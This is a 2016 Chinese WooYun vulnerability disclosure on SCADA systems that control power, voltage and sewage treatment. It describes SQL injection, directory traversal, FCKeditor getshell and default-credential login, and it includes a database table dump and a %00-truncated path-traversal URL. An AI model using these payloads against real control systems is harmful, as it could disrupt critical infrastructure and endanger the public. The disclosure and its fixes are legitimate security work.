当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193856

漏洞标题:某大型SCADA通用系统多处漏洞可控制/电压系统/污水处理系统/供电设备系统(无需登录getshell)

相关厂商:cncert国家互联网应急中心

漏洞作者: Aasron

提交时间:2016-04-08 17:30

修复时间:2016-07-11 17:40

公开时间:2016-07-11 17:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-12: 厂商已经确认,细节仅向厂商公开
2016-04-15: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-06-06: 细节向核心白帽子及相关领域专家公开
2016-06-16: 细节向普通白帽子公开
2016-06-26: 细节向实习白帽子公开
2016-07-11: 细节向公众公开

简要描述:

最后才发现这是跟我开的一个玩笑!
狗哥:这次硬不硬

详细说明:


#1 前言
系统采用的是一款东方DF8003C型号的控制系统,这里有个简单介绍

http://**.**.**.**/link?url=voTDWhx82NQaCYRe9JGAbzuPxDjetIru7aYlyyl7EFpVEOofDyRykcDYdPQNGmitPvCrco9_mcFQhheNDu4YYsKP7e01YDsCx4MBLzPX6CK


系统能进行操作的功能如简介里面一样

1.png


#2 漏洞
这套系统问题多,我前期排查一共发现三处高危漏洞,其中两处可直接利用
第一处:目录遍历

**.**.**.**:5000


help/php

目录下直接遍历很多关键文件

1.png


第二处:
大家应该也已经看到fck编辑器了吧,这里就不说这个编辑器了
第三处:
这套系统存在一个通用SQL注入漏洞
#3 测试中...
找到SQL注入漏洞,那问题也很简单,只需要找到管理员的表即可

| C2000_动作信息          |
| C2000_定值信息          |
| C2000_测量类型          |
| C2000_自检信息          |
| CAS2000_动作信息        |
| CAS2000_故障信息        |
| CAS2000_测量信息        |
| CAS2000_自诊断信息        |
| CDT扩展五防规约配置表             |
| CDT规约配置表             |
| CSC2000_动作信息        |
| CSC2000_定值信息        |
| CSC2000_故障信息        |
| CSC2000_自诊断信息        |
| CSC2000_量测信息        |
| DA出口开关参数表              |
| DA区域参数表              |
| DA开关拓扑表              |
| DA故障事项表              |
| DA故障定位信息表              |
| DA故障待恢复区域信息表              |
| DA故障待恢复系统信息表              |
| DA故障恢复开关信息表              |
| DA故障恢复方案ߣ              |
| DA故障扩大隔离开关信息表              |
| DA故障索引表              |
| DA故障隔离开关信息表              |
| DA环网柜开关表              |
| DA线路拓扑表              |
| DA运行参数设置表              |
| DF3000NEW_动作信息      |
| DF3000NEW_定值信息      |
| DF3000NEW_辅助定值信息      |
| DF3000NEW_量测信息      |
| DF3003_动作自检         |
| DF3003_定值信息         |
| DF3003_量测信息         |
| DF3600_动作信息         |
| DF3600_定值信息         |
| DF3600_故障信息         |
| DF3600_测量值信息         |
| DF3600_量测信息         |
| DFP500_定值信息         |
| DFP500_开关量         |
| DFP500_故障信息         |
| DFP500_测量值         |
| DFP500_自诊断信息         |
| DFP_动作信息            |
| DFP_定值量值            |
| DFP_定值量值类型            |
| DFP_自检信息            |
| DM配置类型索引表              |
| DM配置表              |
| DSA_301动作信息         |
| DSA_301定值信息         |
| DSA_301故障信息         |
| DSA_301测量值信息         |
| DSA_301自诊断信息         |
| DWK_动作信息            |
| DWK_故障信息            |
| EMS线路段参数表             |
| EPRISVC_事件信息        |
| EPRISVC_定值信息        |
| EPRISVC_开出信息        |
| EPRISVC帧类别         |
| EPRISVC模块类型         |
| FBZ_动作信息            |
| FBZ_定值信息            |
| FBZ_故障信息            |
| FBZ_自诊断信息            |
| FBZ_量测信息            |
| FDK高速采样模块参数表             |
| FWB_动作信息            |
| FWB_定值信息            |
| FWB_测量信息            |
| FWB_诊断信息            |
| FWB_配置信息            |
| GPRS参数表            |
| HUANENG_定值信息        |
| HUANENG_量测信息        |
| IEC101zf规约配置表        |
| IEC101规约配置表          |
| IEC103_ASDU1    |
| IEC103_ASDU10   |
| IEC103_ASDU2    |
| IEC103_故障信息         |
| IEC103信息对照表          |
| IEC103装置类型表          |
| IEC104zf规约配置表        |
| IEC104规约配置表          |
| ISA300_动作信息         |
| ISA300_定值信息         |
| ISA300_故障信息         |
| ISA300_自诊断信息         |
| ISA300_量测信息         |
| ISA_动作信息            |
| ISA_定值信息            |
| ISA_小电流接地表            |
| ISA_故障信息            |
| ISA_测量值信息            |
| ISA_自诊断信息            |
| JINNENG_定值信息        |
| LFP_事件信息            |
| LFP_定值信息            |
| LFP_开关量信息            |
| LFP_模块信息            |
| LFP_模拟量信息            |
| LFP_自检信息            |
| LSA_P_动作信息          |
| LSA_P_定值信息          |
| LSA_P_故障信息          |
| LSA_P_测量值信息          |
| LSA_P_自诊断信息          |
| MLN98_小电流接地表          |
| N4F配置表             |
| NEWISA_动作信息         |
| NEWISA_定值信息         |
| NEWISA_小电流接地表         |
| NEWISA_故障信息         |
| NEWISA_测量值信息         |
| NEWISA_自诊断信息         |
| NZC_事件信息            |
| RCS9000_动作信息        |
| RCS9000_开关量状态        |
| RDCU_动作信息           |
| RDCU_定值信息           |
| RTU值表             |
| RTU参数表             |
| RTU路径参数表             |
| RTU路径状态值表             |
| SAC94_事件信息          |
| SBC_动作信息            |
| SCADA_MIS设备对照表       |
| SCADA应用对象类型表           |
| SCIZF配置表           |
| SCI配置表             |
| SEL_动作信息            |
| TIGER_定值信息          |
| TOPO开关刀闸参数表            |
| TOPO母线参数表            |
| TOPO线路参数表            |
| TOPO连接节点表            |
| UT99_定值信息           |
| VW_EVT_TYPE     |
| WBX_事件信息            |
| WBX_定值信息            |
| WBX_测量信息            |
| WEB_AOPINFO     |
| WEB_MACHINE     |
| WEB_ONLINE      |
| WEB_USERS       |
| XAKY_定值信息           |
| XJS99_定值信息          |
| XJS99模块类型           |
| ZH_定值信息             |
| ZH_测量值信息             |
|                |
| !               |
| !               |
| 保护DF3003装置类型	         |
| 刀闸表               |
| 报警图索引表               |
| 状态信息表               |
| 规约配置表               |
| 追忆参数表\x03            |
| 追忆组信息表\x05            |
| dnp规约配置表             |
| dtproperties    |
| histable        |
| histableother   |
| newid           |
| reltable        |
| sysconstraints  |
| syssegments     |
| testtb          |
| tmp_code        |
| tmp_codeone     |
| tmp_compare     |
| tmp_count       |
| tmp_data        |
| tmp_maxtime     |
| tmp_mintime     |
| tmp_mondata     |
| tmp_mondate     |
| tmp_over        |
| tmp_overone     |
| tmp_overvoltage |
| tmp_total       |
| tmp_voltage     |
| tmp_yccode      |
| tmp_yeardata    |
| tmp_yeardate    |
| tp_max          |
| tp_min          |
| trashid         |
| viewtable       |
| 主机状态表           |
| 事项句表            |
| 事项处理方式表I               |
| 事项模式表           |
| 事项状态描述表         |
| 事项类型信息表         |
| 事项类型表           |
| 事项级别表           |
| 五防控制对象表         |
| 五防控制条件表         |
| 五防控制组表          |
| 五防操作序列表         |
| 五防操作组表          |
| 五防设备许可表         |
| 保护DF3000NEW装置类型       |
| 保护DF3003功能类型          |
| 保护DF3600装置类型          |
| 保护FWB模块类型             |
| 保护HUANENG模块类型         |
| 保护JINNENG模块类型         |
| 保护LFP模块类型             |
| 保护NEWISA装置类型          |
| 保护RCS9000模块类型         |
| 保护RDCU_模块类型           |
| 保护SAC94事件类型           |
| 保护SEL动作类型             |
| 保护SEL模块类型             |
| 保护UT99模块类型            |
| 保护WBX保护类型             |
| 保护WBX功能类型             |
| 保护XJ事件类型              |
| 保护信号值表          |
| 保护信号表           |
| 保护类型1表               |
| 保护类型2表               |
| 保护类型表           |
| 保护装置表           |
| 保护规约类型表         |
| 公司参数表           |
| 其他转发视图          |
| 刀闸值表            |
| 刀闸参数表           |
| 分接头类型表          |
| 列查询配置表          |
| 前置事故总配置表        |
| 前置终端服务器表        |
| 前置计算配置表         |
| 前置配置表           |
| 区域参数表           |
| 升降参数表           |
| 厂站参数表           |
| 厂站表             |
| 厂站遥控闭锁对应表       |
| 厂站遥控闭锁表         |
| 历史数据期限表         |
| 历史服务器容量参数表      |
| 参数域属性表          |
| 参数表中间索引关系       |
| 参数表属性表          |
| 双遥控号对照表         |
| 发电机参数表          |
| 变压器参数表          |
| 变压器接线类型表        |
| 同期参数表           |
| 图形文件共享表         |
| 图形装饰域参数表        |
| 图形设备分类表         |
| 地标参数表           |
| 域修改配置表          |
| 域显示属性表          |
| 多态值表            |
| 多态参数表           |
| 定时打印信息表         |
| 实时库列模式          |
| 实时库域名表          |
| 实时库表名表          |
| 实时库表模式          |
| 实时库装载关系表        |
| 实时数据服务器名表       |
| 容器分量表           |
| 容器表             |
| 常用参数表           |
| 序列控制参数表         |
| 序列控制对象表         |
| 开关保护关系表         |
| 开关保护模块关系表       |
| 开关值表            |
| 开关刀闸参数表         |
| 开关参数表           |
| 开关替代关系表         |
| 开关表             |
| 开关连接刀闸表         |
| 开关连接设备表         |
| 微机保护参数表         |
| 微机保护权限表         |
| 报表              |
| 报表打印信息表         |
| 报表用户权限表         |
| 故障检测状态表         |
| 数据库应用分类索引表      |
| 数据库状态表          |
| 日时段参数表          |
| 日时段组名表          |
| 时段区域名表          |
| 时段参数表           |
| 服务器状态表          |
| 权限功能定义表         |
| 标志牌功能信息表        |
| 标志牌操作菜单配置表      |
| 标志牌记录表          |
| 档位信息表           |
| 档位遥调参数表         |
| 模拟量值表           |
| 次遥信号排序表         |
| 母线参数表           |
| 母线拓扑表           |
| 母线表             |
| 消弧线圈            |
| 消弧线圈档位表         |
| 状态值表            |
| 状态控制条件表         |
| 状态表             |
| 用户口令表           |
| 用户定义表           |
| 用户组表            |
| 用户角色表           |
| 用户责任区表          |
| 用户过程表           |
| 电压互感器表          |
| 电压名表            |
| 电压等级颜色对照表       |
| 电压等级颜色表         |
| 电压限值表           |
| 电子值班事项表         |
| 电子值班接收遥测用户表     |
| 电子值班用户表         |
| 电子值班短信遥测发送表     |
| 电子值班遥信点事项表      |
| 电子值班遥测点事项表      |
| 电容器参数表          |
| 电度值表            |
| 电度参数表           |
| 电度多源信息表         |
| 电度多源索引表         |
| 电度转发视图          |
| 电抗器参数表          |
| 电流互感器表          |
| 界面显示参数表         |
| 秒级曲线参数表         |
| 程序注册表           |
| 端子表             |
| 线路参数表           |
| 线路型号表           |
| 自定义潮流表          |
| 节点事项表           |
| 节点事项过滤表         |
| 节点厂站过滤表         |
| 节点对象过滤表         |
| 节点权限表           |
| 节点责任区表          |
| 节点镜像类型表         |
| 菜单属性表           |
| 表对象类型关系表        |
| 规约类型表           |
| 规约配置类型表         |
| 角色定义表           |
| 计算变量值表          |
| 计算变量表           |
| 设备对象类型关系表       |
| 设备状态表           |
| 设备类型表           |
| 负荷参数表           |
| 责任区定义表          |
| 转发遥控对照表         |
| 转发遥调对照表         |
| 远动规约类型视图        |
| 连接节点表           |
| 追态值表            |
| 通讯参数表           |
| 通讯组表            |
| 通讯组表前置视图        |
| 通道值表            |
| 通道参数表           |
| 通道报文日志表         |
| 通道曲线偏移表         |
| 通道状态值表          |
| 通道透明转发表         |
| 通道附属属性表         |
| 遥信参数表           |
| 遥信号排序表          |
| 遥信多源信息表         |
| 遥信多源索引表         |
| 遥信转发视图          |
| 遥控参数表           |
| 遥控提示表           |
| 遥测参数表           |
| 遥测多源信息表         |
| 遥测多源索引表         |
| 遥测报警限值表         |
| 遥测转发视图          |
| 遥测限值时段参数表       |
| 遥测限值时段类型表       |
| 遥调参数表           |
| 避雷器表            |
| 配调控制对象表         |
| 量测映射表           |
| 量测量参数表          |
| 镜像表模式           |
| 间隔值表            |
| 间隔参数表           |
| 零支路表            |
| dboutpara       |
+-----------------+


一共409张表,后面找到管理员登录密码及账号

1.png


戏剧性的一幕来了,测试了半天,拿着注入出来的账号密码,满心欢喜的想登录,却发现怎么都是提示登录失败,无论在后台还是在前台都是如此
这突然心情....
这个时候我记得我之前突然找的到一张表,表名是用户口令表,但里面只出现了一个root
但是这个root却是关键了
进行登录账号密码的尝试

1.png


这样就进去了,切换到前台进行登录

1.png


这里可以直接进行电压和电力设备的开启及关闭

1.png


这套系统有人挖过,不再阐述太多。
第二台SCADA控制系统
这套问题相对来说 还要多一些,同时存在SQL注入及任意文件读取漏洞,需要%00截断

1.png


有了前一次的教训,既然系统界面大致一样,我在进行目录探测时,发现结构大概差不多,
会不会也是同样存在user表?又或者账号和密码都是默认生成的?
结果发现证明了我的观点
任意文件读取漏洞

**.**.**.**:8181/modules/tmr/server/switchcontrolpanel.php?func=../../../../../../../../../../windows/win.ini%00.jpg

漏洞证明:

利用前一次的账号密码,直接进行了登录

1.png


系统界面大致一样,但功能还要强大一些,能操作配电系统、污水处理系统、热力站、深井检测系统

1.png


能开关多个区域供电设备

1.png


2.png


实时监控数据

1.png


1.png


利用fck编辑器
可以getshell

1.png


1.png


1.png


2.png


还有一个系统我就不测试了,到此结束

声明:未进行任何相关危险操作


修复方案:

1.参数过滤
2.对访问目录的限制
3.编辑器修复或升级编辑器版本

版权声明:转载请注明来源 Aasron@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-12 17:35

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无

漏洞评价:

评价